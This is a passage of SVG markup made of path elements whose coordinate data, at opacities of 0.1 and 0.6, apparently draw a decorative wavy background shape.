1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 